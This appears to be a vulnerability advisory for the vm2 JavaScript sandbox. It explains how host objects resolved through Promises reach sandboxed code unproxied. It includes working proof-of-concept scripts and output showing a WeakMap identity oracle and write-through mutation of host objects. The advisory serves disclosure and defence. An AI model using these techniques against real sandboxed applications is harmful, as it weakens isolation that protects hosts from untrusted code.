CVE-2026-44000

Summary

• Performing identity checks using host-side WeakMap
• Mutating host object state from inside the sandbox

Details

globalPromise.prototype.then = function then(onFulfilled, onRejected) {
 resetPromiseSpecies(this);

 if (typeof onFulfilled === 'function') {
  const origOnFulfilled = onFulfilled;
  onFulfilled = function onFulfilled(value) {
   value = ensureThis(value);
   return apply(origOnFulfilled, this, [value]);
  };
 }

 return apply(globalPromiseThen, this, [onFulfilled, onRejected]);
};


The wrapper calls ensureThis(value) before invoking the sandbox callback.

However, ensureThis is implemented in bridge.js as thisEnsureThis():

function thisEnsureThis(other) {
 const type = typeof other;

 switch (type) {
  case 'object':
   if (other === null) return null;

  case 'function':
   let proto = thisReflectGetPrototypeOf(other);

   if (!proto) {
    return other;
   }

   while (proto) {
    const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);

    if (mapping) {
     const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);
     if (mapped) return mapped;
     return mapping(defaultFactory, other);
    }

    proto = thisReflectGetPrototypeOf(proto);
   }

   return other;

If no prototype mapping is found, ensureThis() simply returns the original object:

return other;

This means the sandbox receives the original host object instead of a proxied or sanitized representation.

Because of this behavior, values resolved by host Promises can cross the host–sandbox boundary with identity preserved.

PoC

The following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side WeakMap from inside the sandbox.

WeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.

PoC Code
import {VM} from "./index.js";

const hostObj = {tag: "HOST OBJ"};
const hostPromise = Promise.resolve(hostObj);

// WeakMap created on the host
const wm = new WeakMap([[hostObj, "HIT"]]);

const vm = new VM({
 sandbox: {hostPromise, wm},
 timeout: 1000,
 eval: false,
 wasm: false,
});

const code = `
 hostPromise.then(v => ({
  weakMapGet: wm.get(v),
  typeofV: typeof v,
  tag: v.tag
 }))
`;

const result = await vm.run(code);

console.log("VM RESULT:", result);
console.log("HOST SAME KEY STILL:", wm.get(hostObj));
Output
VM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST OBJ' }
HOST SAME KEY STILL: HIT

This confirms that the object delivered to the sandbox callback retains host identity.

Additional Demonstration: Host Object Mutation

The sandbox can also mutate host object state through the resolved Promise value.

import {VM} from "./index.js";

const hostObj = {tag: "HOST OBJ", nested: {x: 1}};
const hostPromise = Promise.resolve(hostObj);

const vm = new VM({
 sandbox: {hostPromise},
 timeout: 1000,
 eval: false,
 wasm: false,
});

const code = `
 hostPromise.then(v => {
  v.nested.x = 999;
  v.tag = "MUTATED";
  return { seenTag: v.tag, seenX: v.nested.x };
 })
`;

const result = await vm.run(code);

console.log("VM RESULT:", result);
console.log("HOST AFTER:", hostObj);

**Output:**
VM RESULT: { seenTag: 'MUTATED', seenX: 999 }
HOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }

This demonstrates write-through mutation of a host object from sandbox code.

**Impact**
This vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.

Consequences include:

Host object identity disclosure

Write-through mutation of host objects

WeakMap / WeakSet identity oracle across the boundary

Potential capability leaks if sensitive host objects are reachable via Promises

Applications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.

This weakens the intended isolation guarantees of vm2.